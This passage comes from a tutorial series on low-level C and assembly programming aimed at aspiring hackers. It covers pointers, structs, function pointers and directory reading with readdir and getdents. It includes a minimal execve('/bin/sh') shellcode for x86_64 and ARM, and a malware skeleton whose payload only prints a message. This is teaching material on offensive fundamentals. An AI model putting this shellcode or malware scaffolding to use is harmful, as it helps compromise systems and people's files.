: 220 | 400544: 55 push rbp 221 | 400545: 48 89 e5 mov rbp,rsp 222 | 400548: 53 push rbx 223 | 400549: 48 83 ec 08 sub rsp,0x8 224 | 40054d: bb 5c 06 40 00 mov ebx,0x40065c 225 | 400552: ba 0d 00 00 00 mov edx,0xd 226 | 400557: 48 89 de mov rsi,rbx 227 | 40055a: bf 01 00 00 00 mov edi,0x1 228 | 40055f: e8 dc fe ff ff call 400440 229 | 400564: bf 00 00 00 00 mov edi,0x0 230 | 400569: e8 c2 fe ff ff call 400430 <_exit@plt> 231 | (....) 232 | 233 | 234 | Let's skip the first 4 instructions (that's the stack stuff that we haven't discussed yet), and let's try to find our pointer... Have you spot it? 235 | 236 | Sure, you see how do we copy `rbx` into `rsi` after setting `ebx` (the 32bits part of `rbx`) to `0x40065c`... and what is in there?... Let's check it 237 | 238 | $ gdb ./hello 239 | (gdb) x/s 0x40065c 240 | 0x40065c: "Hello World!\n" 241 | 242 | _Note: You have to run all commands above. You may get different addresses in your system_ 243 | 244 | # C pointers 245 | I guess you have already figure out how to declare a pointer in C. Sure, you have to use the `*`. However, in C we need to specify types. In this specific example it does not really makes a difference, but in the general case the pointer type is important and useful. 246 | 247 | A C pointer is, therefore, declared this way: 248 | 249 | ```C 250 | type *pointer; 251 | ``` 252 | 253 | This declares a pointer to a memory address containing a value of a certain type. So... which types does C knows. This is the list: 254 | 255 | char Byte Minimal addressable element (not necessarily 8 bits) 256 | int Integer Default integer type 257 | short Integer Usually half of the default integer or equivalent to int 258 | long Integer Usually double of the default integer or equivalent to int 259 | float Floating Point Single Precision Floating Point 260 | double Floating Point Double Precision Floating Point 261 | void Nothing Nothing or Anything 262 | 263 | C also supports compound types, but we will not talk about those right now. 264 | 265 | Confused again?. This is a simple program to figure out the size of each type in your system and better understand the difference between all those types: 266 | 267 | ```C 268 | #include 269 | int main () 270 | { 271 | printf ("Size of void* : %ld\n", sizeof(void*)); 272 | printf ("Size of short : %ld\n", sizeof(short)); 273 | printf ("Size of int : %ld\n", sizeof(int)); 274 | printf ("Size of long : %ld\n", sizeof(long)); 275 | printf ("Size of float : %ld\n", sizeof(float)); 276 | printf ("Size of double : %ld\n", sizeof(double)); 277 | return 0; 278 | } 279 | ``` 280 | 281 | The `stdio.h` at the beginning is required to use the function `printf`. The function `printf` (PRINT Formatted) lets us print messages using format strings to compose complex outputs. In this case, we are using the `%ld` format string to print the long value returned by `sizeof`. This basically tells `printf`, I have a number here that I want you to convert into a string... please do it. 282 | 283 | We can add many of those `%` in the format string and provide additional parameters to the function to fill them. Check the `printf` man page for details about the format strings you can use with `printf`. 284 | 285 | Finally, as you can imagine, `sizeof` returns the size, in bytes, of a given type or variable. 286 | 287 | In our test program we used a `void*` variable. This is a pointer to `void` what, for a pointer, means a raw pointer or a pointer to anything. This is actually the C equivalent to the assembly pointer we used in our ASM code. 288 | 289 | We will come back to the C pointers later to fully understand the implications of pointer's type. But I think this is enough for now 290 | 291 | # Your First Shellcode 292 | So, believe it or no, you have already learn all the bits and pieces to write a very basic shellcode. A shellcode, in its simplest form, is a piece of code that starts a shell. It is usually feed into a vulnerable program using a exploit, effectively enabling the attacker to acquire a shell with the same privileges of the vulnerable program. In general an attacker will be targeting processes running as `root` to get full access to the machine. 293 | 294 | In Linux, you can execute a process using the `exec` system call. This system call has 3 parameters, but for your first shellcode you can set to 0 the last two. The only parameter we need is the first one... a pointer to the name of the program to run.... that in this case would be `/bin/sh'. 295 | 296 | ```nasm 297 | section .text 298 | global _start 299 | 300 | _start: 301 | mov rax, 0x3b ; SYS_exec 302 | mov rdx, 0 ; No Env 303 | mov rsi, 0 ; No argv 304 | mov rdi, cmd ; char *cmd 305 | syscall 306 | 307 | cmd: db '/bin/sh',0 308 | 309 | ``` 310 | 311 | Wow!... it is roughly the same program that the `Hello World` we wrote before!!!!. Are you missing the `exit` system call?... take a look to the exec man page (`man 2 exec`) to know why we do not need it any more. 312 | 313 | ## `/bin/sh` 314 | You may be wondering: why `/bin/sh`?. I always use `bash`, or `dash`, or `zsh`, or `ksh`,... Sure, you can run many different shells (command interpreters) but in almost any Unix out there, independently of the actual shell you usually use, you always will have `/bin/sh`. In general, it is a soft link to a real shell. 315 | 316 | The reason for this, at least one of them, is that the system runs a lot of shell scripts for doing different things. You have shell scripts executed during the boot process, whenever you start or stop a service, when you launch some applications,... Imagine that whenever a user wants to change its default shell, the system will have to update all those scripts... what about the ones you wrote on your own, those the system knows nothing about... they will just break. 317 | 318 | Therefore, as a convention, all Unix system have a binary at `/bin/sh` that runs a shell and all shell scripts rely on the existence of that file... Well... not all Unix system. Keep reading. 319 | 320 | 321 | # ARM Shell code 322 | So, we should be able to port our x86_64 asm shell code to ARM very easily. In case you are feeling lazy, this is how it may look like. 323 | 324 | ```nasm 325 | .text 326 | .globl _start 327 | 328 | _start: mov r7, #11 329 | mov r1, #0 330 | mov r2, #0 331 | ldr r0,=msg 332 | swi #0 333 | 334 | 335 | .data 336 | msg: 337 | .asciz "/system/bin/sh" 338 | ``` 339 | 340 | have you seen it?... sure, this code is for Android. Android had mesh up the standard Linux disk tree, and the default shell is no longer at `/bin/sh` but at `/system/bin/sh`. If you are going to test the code in another ARM platform as a BeagleBone Black, a BananaPi or an Olinuxino running a standard Linux distro (usually Debian), just change the string to the well-known location `/bin/sh`. The rest of the code should just work. 341 | 342 | We can compile it like this: 343 | 344 | $ arm-linux-gnueabi-as -o sh-arm.o sh-arm.s 345 | $ arm-linux-gnueabi-ld -o sh-arm sh-arm.o 346 | 347 | Let's take a closer look to the code. Did you notice it?. Yes, there are some differences when compared to our Intel code. This is for two reasons. The first one is that `NASM` only produces code for intel processors, so we cannot use it for ARM. You should had noted this before... I'm amaze nobody had asked about this from the previous parts. Anyways, the syntax of the GNU assembler (`as`) is slightly different. This one is known as AT&T assembly whereas the one used by `NASM` is known as Intel assembly... As a wannabe hacker you should learn both :P 348 | 349 | So, the GNU assembler uses the assembler instruction `.asciz` to add a zero-terminated ASCII string to the memory. It is the same thing that the `nasm` `db`, but automatically adding the 0 at the end. The second comment is that we have to use `ldr` to load our pointer in our `r0` register. 350 | 351 | Well, `ldr` is an ARM __pseudo-instruction__. The bottom line is that you cannot directly load 32bits values into a register in an ARM processor. I will not go into the details (you can google it), but roughly, ARM produces a very compact machine code, and tries to encode a lot of information on each 32bits machine code word, including the mnemonic parameters. This limits the size of the values that can be directly loaded into a register. The `ldr` pseudo instruction is expanded by the assembler in the right sequence of instruction to load a 32bits value in a register. There are more pseudo-instructions for ARM and we will go through them as needed. 352 | 353 | The conclusion of all this is that, for ARM you have to use the syntax above to load a 32 bits constant or address (which in practical terms are the same thing) into a register. 354 | 355 | # MIPS 356 | OK guys. My MIPS setup is so crappy that it is a pain to keep including it in this course. If any of you wants to contribute this section, just let me know. Until I get this development environment sorted out I will skip the MIPS sections from now on. 357 | 358 | 359 | # Conclusions 360 | In this part we have had our first encounter with pointers at the lowest level and we have learn how to use them together with a system call. Using these two simple concepts we manage to create a shell code. This shell code is not usable in the wild, but you will learn how to update it for practical purposes later in this course. If you cannot wait, check the @unh0lys0da article here https://0x00sec.org/t/linux-shellcoding-part-1-0/289 or the read classical "Smashing the Stack for Fun and Profit" from Aleph one! 361 | 362 | * PREVIOUS: [Programming for Wannabes. Part II and a half. Systemcalls (ARM and MIPS)](part-02.5.md) 363 | * NEXT: [Programming for Wannabes. Part IV. The Stack](part-04.md) 364 | 365 | -------------------------------------------------------------------------------- /part-07.md: -------------------------------------------------------------------------------- 1 | # Programming for Wanabes VII. Finding files I 2 | It is time to get started with more advanced code. We will be introducing multiple concepts from this point on and hopefully we will boost our programming skills in no time. In the previous instalment we identified the ability to find files in the disk as a feature required by several malwares. 3 | 4 | Actually it is a feature required by many other applications and will let us learn about new system calls, loops and structures. Without further ado, let's jump into the topic 5 | 6 | # Getting Ready to Read directories 7 | Whenever you need to read the content of a folder and you want to be portable between platforms, the right way to proceed is using the POSIX interface. 8 | 9 | I will first dump here a shrink down version of the general program from the [previous instalment](https://0x00sec.org/t/programming-for-wannabes-part-vi-malware-introduction/25595/). In the rest of this text we will just work out the `select_target` functions. Everything else will stay the same for the time being. So, this is our starting point: 10 | 11 | ```C 12 | #include 13 | #include 14 | #include 15 | #include 16 | 17 | #include // POSIX directoy reading interface 18 | #include 19 | 20 | char *the_folder="/tmp/"; 21 | 22 | typedef int (*PAYLOAD_FUNC)(char *); 23 | 24 | int payload (char *target) { 25 | printf ("Doing malware things to %s\n", target); 26 | } 27 | 28 | int select_target (PAYLOAD_FUNC pf) { 29 | return 0; 30 | } 31 | 32 | int main () { 33 | while (select_target(payload)); 34 | } 35 | ``` 36 | 37 | No big surprises here, a bunch of include files with the functions and data structures we will need and the functions we introduced for our generic malware. The only tricky thing here is the definition of a function type. I introduced this silently in the previous instalment, but this time we should look deeper into this so you understand what we are doing. 38 | 39 | ## Function Pointers 40 | One of the data types that we can use in C are the so-called pointers. We had introduced them earlier in this series, but for completeness let's quickly define them again: a pointer is just a variable that contains a memory address. It is said that it _Points to_ that address, hence the name... _Pointer_. 41 | 42 | Usually pointers point to addresses containing data (variable pointers), but there is no reason why a pointer wouldn't point to an address containing code... a function for instance. In assembly this is very straight forward, we just need to do `call/jmp` with some kind of indirect addressing (that is, using a register or variable that contains the address to jump into, instead of the direct address, so we can control that value programatically). Let's see this with an example 43 | 44 | DIRECT INDIRECT 45 | mov payload, %rax 46 | call payload callq *%rax 47 | 48 | 49 | In the direct code we are using the `payload` address directly. In the indirect code we load the function address in a register and then we jump to the address stored in that register. In general, when you declare a function pointer variable, that pointer will be stored somewhere in the stack, and instead of loading the address directly on `RAX` (like in this example), we will load `RAX` with that stack value. 50 | 51 | Let's change the `select_address` above to actually call `payload` and let's take a look to the generated code: 52 | 53 | ```C 54 | int select_target (PAYLOAD_FUNC pf) { 55 | pf (the_folder); 56 | return 0; 57 | } 58 | ``` 59 | 60 | This produces the following assembler. You have to compile it with `-O2` so the code gets slightly optimised, otherwise, gcc will generate code to store the parameter (the function pointer) in the stack and just after that read that stack value and put it in `RAX`. In other words it just moves the parameter around doing nothing. 61 | 62 | ```asm 63 | 00000000000006c0 : 64 | 6c0: 48 83 ec 08 sub $0x8,%rsp 65 | 6c4: 48 89 f8 mov %rdi,%rax 66 | 6c7: 48 8b 3d 42 09 20 00 mov 0x200942(%rip),%rdi # 201010 67 | 6ce: ff d0 callq *%rax 68 | 6d0: 31 c0 xor %eax,%eax 69 | 6d2: 48 83 c4 08 add $0 70 | 6d6: c3 retq 71 | 72 | ``` 73 | 74 | We already know all this, but let's refresh our minds once again: 75 | 76 | * We get our parameter (the `payload` address in this case) in `RDI` 77 | * We copy it into `RAX` 78 | * Put the `the_folder` variable in `RDI` (remember `RDI` contains the first parameter) 79 | * Run the function indirectly (jump to the content of `RAX` that in this case is `payload`) 80 | 81 | So, that's it. In this case we are using the pointer directly, but we could store it in memory and then we will be talking about a function pointer variable. This is obvious and straightforward in asm, but in C we need to use a kind of cryptic way to define function pointers: 82 | 83 | ```C 84 | return_type (*var/type) (parameters); 85 | ``` 86 | 87 | So you just need to put parenthesis (and an `*`, after all we are defining a pointer) around the variable or type that you want to define. Let's see a few examples: 88 | 89 | ```C 90 | int (*func)(int, int); 91 | ``` 92 | This declares a variable named `func` that is a pointer to a function returning an integer, and expecting two integers as parameters. 93 | 94 | ```C 95 | typedef int (*FUNC)(int, int); 96 | FUNC func; 97 | ``` 98 | 99 | This renames a function pointer type (that is what `typepdef` does) to represent the same function we defined above. Then it declares the same variable but using the new type name. This makes the code more readable, but other than that, there is no difference at all. 100 | 101 | Also note that the assembler generated to call our function (via the function pointer) is independent of the actual types in the declaration.... you can call the function with whatever you want... but the function will likely not work as expected, or even crash. The types definitions are just used by the compile to let us know that we are doing what we are suppose to do. Just change the type definition and recompile, you will get the same code. 102 | 103 | 104 | # Reading a directory the POSIX way 105 | 106 | Now we can get back to the main topic, how to read the content of a directory. Remember, virus, ransomware, spyware, all of them need to scan the disk to find different types of files. Let's see how to do this. 107 | 108 | We will start doing it the _Right Way_, that is, how it is expected to be done by any normal system application. And that is using the POSIX interface that is composed of three functions: 109 | 110 | opendir Opens a directory for reading 111 | readdir Read one directory entry each time it is called 112 | closedir Closes the directory 113 | 114 | This API is intended to mimic the normal file interface (the stream like interface offered by `fopen/fread/fclose`), but just using slightly different data structures. Using this function our `select_target` function will look like this: 115 | 116 | ``` 117 | int select_target (PAYLOAD_FUNC pf) { 118 | struct dirent *de; 119 | DIR *d; 120 | 121 | if (!(d = opendir (_the_folder))) {perror ("opendir:"); exit (EXIT_FAILURE);} 122 | 123 | while (1) { 124 | errno = 0; 125 | if (!(de = readdir (d))) { 126 | if (errno) perror ("readdir:"); 127 | break; 128 | } 129 | pf (de->d_name); 130 | } 131 | closedir (d); 132 | return 0; 133 | } 134 | ``` 135 | 136 | The first thing to note is that, `DIR*` is the type used by all the function, it is similar to the classical `FILE*` that we use with files (when using the stream interface). Conceptually it is the same, a stream abstraction of a directory. The `opendir` and `closedir` are intended to intialise the structure and to finish the processing respectively (and release resources). Not much more to say about them, you need to call `opendir` before start reading the directory, and you have to call `closedir` whenever you are done processing your folder. Yes, the parameter to `opendir` is just a string containing the folder to process. We will see later what those functions really do under the hood. 137 | 138 | The interesting function is `readdir` that is the one that actually reads directory entries one by one. 139 | 140 | # `structs` 141 | Before looking into `readdir` in detail, we need to introduce a new C keyword: `struct`. A `struct` is a so-called compound type. It is a compound type because it is composed of other types. Each one of those types together with the new we give to them is known as a field. You can think about a `struct` like a variable that groups more variables together in a convenient way. 142 | 143 | The way to declare them is like this: 144 | 145 | ```C 146 | struct name_of_the_struct { 147 | type1 field1; 148 | type2 field2; 149 | .... 150 | }; 151 | ``` 152 | 153 | A more specific example could be: 154 | 155 | ```C 156 | struct linux_dirent { 157 | long d_ino; 158 | long d_off; 159 | unsigned short d_reclen; 160 | char d_name[]; 161 | }; 162 | 163 | struct linux_dirent de,*pde; 164 | ``` 165 | 166 | The code above defines a new type named `struct linux_dirent` (note that you need to use `struct` to refer to the new type) composed of two longs (64bits integer), one short (16 bit integer) and a string of unknown size. You can add as many fields as you want, but in this case we are using only 4. 167 | 168 | After the `struct` definition we have defined two variables. One is a `struct` and the other one is a pointer to a `struct`. Once the variables are declared, we can access the fields using the `.` for the struct one and the `->` operator for the pointer. Just like this: 169 | 170 | ```C 171 | de.d_ino = 12345; 172 | de.d_off = 0; 173 | pde = &de; 174 | pde->d_ino = 54321; 175 | pde->d_off = 1; 176 | ``` 177 | 178 | Whenever you need to pass structs as parameters to function, it is usual to redefine them using `typedef`s in order to minimise the writing. Imagine a function that returns one of those `struct linux_dirent` structs and receives as parameter two of them. The prototype will look like: 179 | 180 | ```C 181 | struct linux_dirent my_func (struct linux_dirent p1, struct linux_dirent p2); 182 | ``` 183 | 184 | This is a lot of writing and also it is harder to figure out the function prototype at one glance. Now imagine, you have 20 more function in your API to deal with this data type....So we could just create an _alias_ for this type: 185 | 186 | ```C 187 | typedef struct linux_dirent LDIRENT; 188 | LDIRENT my_func (LDIRENT p1, LDIRENT p2); 189 | ``` 190 | 191 | Which is way more easy to read. However this is a matter of personal use. Both approaches will produce the same code. Some people prefers to write everything so it is always clear what is that type (a struct in this case), and other prefer to redefine them. In the standard C library you will find both. 192 | 193 | _Note: It is not common (but indeed possible) to pass and return structs in C functions, usually you will use pointers instead. The reason is that C passes parameter by value. This means that all parameters we pass have to be copied. It is easier to copy 4/8 bytes for a pointer than the roughly 24 bytes required by the struct in our example._ 194 | 195 | All this may look complicated at first glance, but you will get used to this very quickly. This data structures are all over the place when writing non trivial programs 196 | 197 | However, in this course we are not just learning the syntax of C, we are going deeper. 198 | 199 | # `structs` are just memory blocks 200 | So, what is really a `struct` ?. Short answer: It is just a memory block. When we declare a variable of type struct, we are just allocating enough space to contain all the struct elements either in the stack, in case our variable is local to a function, in the data segment, in case it is a global variable, or in the _Heap_ in case we allocate the memory block dynamically. This last case we will cover later in this course. 201 | 202 | For our previous example we have: 203 | 204 | ```C 205 | struct linux_dirent { 206 | long d_ino; // 8 bytes 207 | long d_off; // 8 bytes 208 | unsigned short d_reclen; // 2 bytes 209 | char d_name[]; // This is a placeholder we will talk about in a sec 210 | }; 211 | ``` 212 | 213 | So, this structure requires 18 bytes, which will likely be rounded up to 24 bytes to keep the memory alignment (check previous instalments when we introduce the native word size). You can just add a `printf` using the `sizeof` operator to find out the actual size of the struct. In memory it will look like: 214 | 215 | 216 | ADDR+18 -> | d_name 217 | ADDR+16 -> | d_reclen (2 bytes) 218 | ADDR+8 -> | d_off (8 bytes) 219 | ADDR --> | d_ino (8 bytes) 220 | +-------------- 221 | 222 | 223 | When declaring a variable, such a variable just names that memory block... Think about it as a label, and therefore it is inmutable (you cannot change its value). It is the same with arrays... they are like pointers but not completely (we will talk about this again when arrays pop up in our way later in the course). 224 | 225 | When you declare a pointer to a struct, you are just allocating memory to store an address that will point to memory block. Note that when declaring a pointer to an structure, the structure is not magically created. It is just a pointer. You need to allocate the memory block for the structure by other means. 226 | 227 | You can now add the `struct` we defined above to your program (we will do that in a sec) and declare a local variable in the `select_file` function. Then take a look to the generated code. The beginning of the function will allocate extra space (the `sub $0xVAL,%rsp` at the beginning) to accommodate the new variable. 228 | 229 | # What about the `d_name` field? 230 | 231 | Many of you may be wondering this.... what does that `char d_name[]` means. Well, it is actually a placeholder. A field added to the `struct` to point to whatever comes after the rest of the fields. Or to get access to a specific point inside the struct if you prefer. This technique is used when the programmer needs to deal with variable length items. 232 | 233 | In this example we do not known how long the name of the directory entry will be. When this happens we usually have two options. We either provide enough space so the longest possible name will fit in our memory block (and/or we limit the longest possible name with additional checks in the code), or we dynamically allocate space for the directory entry whenever we find out its size. Allocations just don't happen magically... even on interpreted languages all these processes are happening under the hood... whenever you add two strings in python a lot of allocation and memory movement happens. 234 | 235 | Let's see how would this work. Imagine we are allocating our structure in the stack. Note that the actual memory block is created/managed by the `readdir` function not for us. The function gives us a pointer to the memory it manages/allocates. As, for the time being, we only know how to allocate memory in the stack, let's assume `readdir` allocates memory in the stack, however it is likely to use some global storage or the heap. You should have an idea of the why at this point. 236 | 237 | Also, let's assume, that the syscalls used by `readdir` (remember `readdir` is a libc function not a system call), will let us known the size of file name it is reporting. Let's imagine the length of the filename is `len`. 238 | 239 | Then `readdir` will allocate in the stack 24 bytes + len, so there is enough space to store the `struct linux_dirent` fields plus the string. In this case the stack will look like this: 240 | 241 | ADDRS+18+len -> | \0 242 | ADDRS+18 -> | d_name (the string goes here) 243 | ADDRS+16 -> | d_reclen (2 bytes) 244 | ADDRS+8 -> | d_off (8 bytes) 245 | ADDRS --> | d_ino (8 bytes) 246 | +-------------- 247 | 248 | Whenever we access the `d_name` field that is located at `ADDR+18`, we will find a variable length string containing the name of the file being read by `readdir`. 249 | 250 | From a syntactic point of view `char d_name[]` represents a character string of unknown size. In practise it is just indicating the offset in the memory block holding the structure where the string will be. 251 | 252 | This technique is also sometimes used in network programming when the length of the packet is unknown until the packet header is read and the field containing the packet size can be read. 253 | 254 | # Reading the directory 255 | 256 | Now that we know what a `struct` is, we can start using `readdir`. This function returns a pointer to a `struct dirent`. This type is defined in `#include ` and as you had already figure out the name comes from _DIRectory ENTry_. 257 | 258 | So, each time we run `readdir` we will get the information of one of the files in the directory. We have to call it again and again until the whole directory is read. So, the question is: when should we stop?. Well, the answer, is in the `man` pages. Never underestimate the amount of information provided by the man pages. So this is what it says: 259 | 260 | RETURN VALUE 261 | On success, readdir() returns a pointer to a dirent structure. (This structure 262 | may be statically allocated; do not attempt to free(3) it.) 263 | 264 | If the end of the directory stream is reached, NULL is returned and errno is not 265 | changed. If an error occurs, NULL is returned and errno is set appropriately. 266 | To distinguish end of stream and from an error, set errno to zero before calling 267 | readdir() and then check the value of errno if NULL is returned. 268 | 269 | 270 | Crystal clear. Now we can recall the main loop in our `select_target` function and look at it again: 271 | 272 | ```C 273 | while (1) { 274 | errno = 0; 275 | if (!(de = readdir (d))) { 276 | if (errno) perror ("readdir:"); 277 | break; 278 | } 279 | pf (de->d_name); 280 | } 281 | ``` 282 | 283 | We had already introduced the `while` loop in the past. It just loops _while_ the condition we set in the `while` is true. In this case, `while(1)` means that the loop will run forever, because the condition is always true (!= 0). 284 | 285 | _NOTE:C doesn't has a boolean type. Conditional operators traditionally returns FALSE as 0 and TRUE as not zero. Setting the while condition to 1 means that it is always true. You could set it to 31173 and it will work the same, but why would you type 5 numbers when you can just type 1?._ 286 | 287 | Then we are prepared to call `readdir`. We set `errno` to zero as proposed in the man page, and call the function, if we get a `NULL` we fall into the `if`. Then we check again the `errno` variable and if it has changed we show and error. In either case, we had an error or we have reached the end of the list, we leave the while loop using `break`. 288 | 289 | >NOTE: The expression we use above `if (!p)` is equivalent to `if (p == 0)` or if you prefer `if (p == NULL)`, the compiler will see that `p` is a pointer and will change 0 to a compatible representation of `NULL`. The way to write this is a matter of personal taste and some people says `if (!p)` is bad style, and some other say it is good.... Just do whatever better suits you, but be aware of what is going under the hood. The key point here is that NULL is a special value and doesn't need to be the integer 0. This may be confusing for the beginner. You can take a look to [the c faq NULL section](http://c-faq.com/null/) for details. 290 | 291 | Otherwise, we access the field `d_name` in the struct `struct dirent` that contains the name of the directory entry returned by `readdir` and pass it to the `payload` function. 292 | 293 | # Reading directories with system calls 294 | 295 | We have a working function able to read the content of a directory in the disk using the POSIX interface. Overall, when writing malware we would like to minimise application dependencies and in the extreme case that implies just using the OS and avoid all libraries... However this is not always possible. 296 | 297 | In this case, instead of using the POSIX function we can use the associated Linux system call. This is perfectly fine, however the drawback is that the POSIX version will work with all POSIX compatible operating systems and the non-POSIX version will be Linux specific. In other words, all POSIX compatible system have the `opendir/readdir/closedir` functions but each one will have different system calls to access the directories. That is what standards are for. 298 | 299 | > NOTE: That our program will work in any POSIX complaint system (Linux, NetBSD, OpenBSD, Solaris, MacOs...) means that we can recompile for those systems and the program will still work, it doesn't mean that any compiled version of our program will run magically in all POSIX compliant OSes 300 | 301 | > NOTE2: Linux is not officially POSIX complaint. Despite of possible minor divergences the main issue is that POSIX certification, as most certifications out there, are really achieved by paying a fee... 302 | 303 | Anyhow, malware is usually target specific (platform-wise) and getting rid of the standard libc will make our program very small and give us much more control on what is in it and what is not. 304 | 305 | So, the system call that we have to use is known as `getdents`. Sure, you got it, it stands for _GET Directory ENTries_. There is a man page for it and it says that there is no wrapper provided by libc, so we have to write our own if we want to use it (the man page already says how to do that): 306 | 307 | 308 | ```C 309 | #include 310 | 311 | int getdents (int fd, char *buf, int len) 312 | { return syscall (SYS_getdents, fd, buf, len); } 313 | ``` 314 | 315 | We will not go all the way down to the kernel right now. We implement it using the `syscall` standard function instead of invoking the `syscall` processor instruction directly so we can still use C code and we do not need to start adding assembler at this point. We will get to that a bit later. 316 | 317 | In order to use this function, we need a file descriptor for the directory. We can get this using the standard `open` system call. This will do the trick: 318 | 319 | ```C 320 | int select_target (PAYLOAD_FUNC pf) { 321 | char buf[BUF_SIZE]; 322 | struct linux_dirent *de; 323 | int fd, n, i; 324 | 325 | // Open directory using open 326 | if ((fd = open (folder, O_RDONLY | O_DIRECTORY)) < 0) exit (1); 327 | 328 | while (1) { 329 | // Read directory entries 330 | } 331 | } 332 | close (fd); 333 | return 0; 334 | ``` 335 | 336 | At this level, we manage the directory exactly the same than a file. We `open` it... and we `close` it whenever we are done. Now is time to see how to use `getdents`. 337 | 338 | ## Using `getdents` 339 | The `getdents` prototype is as follows: 340 | 341 | int getdents(unsigned int fd, struct linux_dirent *dirp, unsigned int count); 342 | 343 | It receives as parameters a file descriptor (the one we got from the call to `open` with flag `O_DIRECTORY`), then a pointer to the `struct linux_dirent` (actually an pseudo-array of items of this type) and finally the size of the buffer we pass as parameter in the second parameter. You will understand this in a second. 344 | 345 | As you can see the second parameter is of type `struct linux_dirent` instead of the `struct_dirent` that we used with the POSIX version. These structures are slightly different, but we can get them from the man pages of the `readdir` function and `getdents` system call respectively. Anyway we had already introduced it previously when we talked about `structs . 346 | 347 | So, how does `getdents` works?. It doesn't return just one directory entry... it returns as many as will fit in the buffer we pass as second parameter, and that number will vary depending on..... Yes sure, on the length of the name of each entry. So the return value (the number of bytes read) is important in order to extract the information. 348 | 349 | The man page also include example code on how to use the system call. I will include here a simplified version to explain how does this syscall work: 350 | 351 | ```C 352 | char buf[BUF_SIZE]; 353 | struct linux_dirent *de; 354 | int fd, n, i; 355 | (...) 356 | while (1) { 357 | n = getdents (fd, buf, BUF_SIZE); 358 | if (n < 0) exit (1); 359 | if (n == 0) break; 360 | 361 | // Build file name 362 | for (i = 0; i < n;) { 363 | de = (struct linux_dirent *)(buf + i); 364 | 365 | pf (de->d_name); 366 | i += de->d_reclen; 367 | } 368 | ``` 369 | 370 | 371 | First we call the syscall and process errors and end condition. And after that we have to process all the entries reported by the syscall...and we do not know how many are there. That number will depend on the size of the buffer we pass to the syscall. So we run our loop over bytes and not over `struct linux_dirent` items because we do not know the size of each entry in the array (actually this is why it is not really an array). 372 | 373 | The variable `n` contains the number of bytes read by `getdents`. 374 | 375 | The first entry will be at offset zero of our buffer. We access it casting our general buffer to the structure, do what we want to do and then we increase the offset by the size of the directory entry that is stored in the field `reclen`. This will update the offset in the buffer to point to the next entry and we repeat the process. 376 | 377 | >NOTE: Casting a pointer is just forcing it into some type. This only make sense for the compiler. In reality, the memory is the same, regardless the cast operation we apply. Casting will allow us to tweak our view of a given memory block. Imaging our memory block is 16 bytes. We can see it as 16 `unsigned chars`, 8 `shorts`, 4 `ints`, 2 `longs` or 1 `longlong`. The memory block will have the same content but in our program the values that will get after casting will be different. 378 | > 379 | > Example: 380 | > A 8 bytes memory block at address ADDR contains. 381 | > 382 | > addr = | 0x00 | 0x01 | 0x02 | 0x03 | 0x04 | 0x05 | 0x06 | 0x07 | 383 | >```C 384 | > long *l = (long *) addr; // l[0] or *l will be 0x0001020304050607 385 | > int *i = (int *) addr; // i[0] or *i will be 0x00010203 and i[1] or *(i+1) = 0x04050607 386 | > char *c = (char *) addr; // c[0] = 0x00, c[1]= 0x01, .... c[7] = 0x07 387 | > ``` 388 | 389 | Let's see this with an example. Imagine a folder containing just a file named `a.txt`. This is what `getdents` will return in the buffer: 390 | 391 | buf+64 -> | inode 392 | +-------------- 393 | buf+59 -> | a.txt\0 394 | buf+57 -> | 24 395 | buf+49 -> | offset 396 | buf+41 -> | inode 397 | +-------------- 398 | buf+38 -> | ..\0 399 | buf+36 -> | 21 400 | buf+28 -> | offset 401 | buf+20 -> | inode <----------+-- addr + 20 402 | +-------------- | ^ 403 | buf+18 -> | .\0 | | 404 | buf+16 -> | 20 -----------+-----------+ 405 | buf+8 -> | offset | 406 | buf --> | inode <----------+--- addr 407 | +-------------- 408 | 409 | _NOTE: According to the man page, the offset is the distance from the start of the directory to the next dirent struct, however after printing the values I get on my test program those number look strange. I may need to double check, but may be related to the actual EXT3 filesystem that stores the directories as linked lists. For the time being we can use `reclen` to deal with the buffer returned by `getdents`, and ignore `d_off`_ 410 | 411 | As you can see we always get the current (`.`) and the parent ( `..`) directories and then the rest of files. In this case we only have an extra file and our 1024 bytes buffer will be mostly empty after reading the whole folder. A directory containing many files may fill the buffer completely and we may need to call `getdents` again to keep reading the directory. 412 | 413 | # Opaque data types. The `DIR` struct 414 | 415 | Now we could figure out what is in the `DIR` type we used with the POSIX interface. It is not that we need that, but figuring out this kind of things will boost your learning... so it is up to you to skip this section or not. 416 | 417 | The `DIR` type is a so-called opaque data type in the sense that the programmer (that is us) cannot see what is in it. Compare this to the `struct dirent` we have been used in our examples, where we can see the different fields and we actually need to use them. 418 | 419 | Opaque data types are used together with an API that does what we need so we do not need to access the structure directly. This has the advantage that new versions of the SW may change the internal structure of the data type and, as far as the API doesn't change our program will still work. This concept is known generically as _Encapsulation_. 420 | 421 | Making a structure opaque is just a matter of not exposing the internal structure. That's means, the structure is not defined in the .h files available to the programmer. We will see how to do this later. For the time being this is not relevant. 422 | 423 | So, with all the information we have, and after learning how to use the POSIX API we can figure out what is in this `DIR` data type and also how to implement the different functions. The structure would be more or less like: 424 | 425 | ```C 426 | typedef struct __my_dirstream { 427 | int fd; // File descriptor returned by open. Required by getdent 428 | char buf[BUF_SIZE]; // Buffer to read directory entries (to call getdent) 429 | int n; // Number of bytes to process 430 | int off; // Number of bytes already processed 431 | } MY_DIR; 432 | ``` 433 | 434 | I will leave as exercise to the reader the implementation of the POSIX interface using `open/getdents/close`. It is a nice exercise to get more fluent with the C programming language. Just do it, it is pretty straightforward with all the information we have learnt so far and will help you to get comfortable with C... you may need to add more fields to the structure above depending on how do you implement the API. 435 | 436 | # The final version 437 | Just for your convenience this is the final complete version of our directory listing program: 438 | 439 | ```C 440 | #define _GNU_SOURCE // Needed by syscall 441 | #include 442 | #include 443 | #include 444 | 445 | #include 446 | #include 447 | #include 448 | #include // Stat systemcall 449 | 450 | #include 451 | 452 | #define BUF_SIZE 1024 453 | 454 | #define MFW_EXIT(s) do {perror (s); exit (EXIT_FAILURE);} while (0) 455 | 456 | // Dirent Data struct 457 | struct linux_dirent { 458 | long d_ino; 459 | off_t d_off; 460 | unsigned short d_reclen; 461 | char d_name[]; 462 | }; 463 | 464 | 465 | char folder[1024]; 466 | 467 | // getdent wrapper. Not provided by glibc 468 | int getdents (int fd, char *buf, int len) 469 | { return syscall (SYS_getdents, fd, buf, len); } 470 | 471 | typedef int (*PAYLOAD_FUNC)(char *); 472 | 473 | int payload (char *target) { 474 | printf ("Doing malware things to %s\n", target); 475 | } 476 | 477 | int select_target (PAYLOAD_FUNC pf) { 478 | char buf[BUF_SIZE]; 479 | struct linux_dirent *de; 480 | struct stat st; 481 | int fd, n, i; 482 | 483 | // 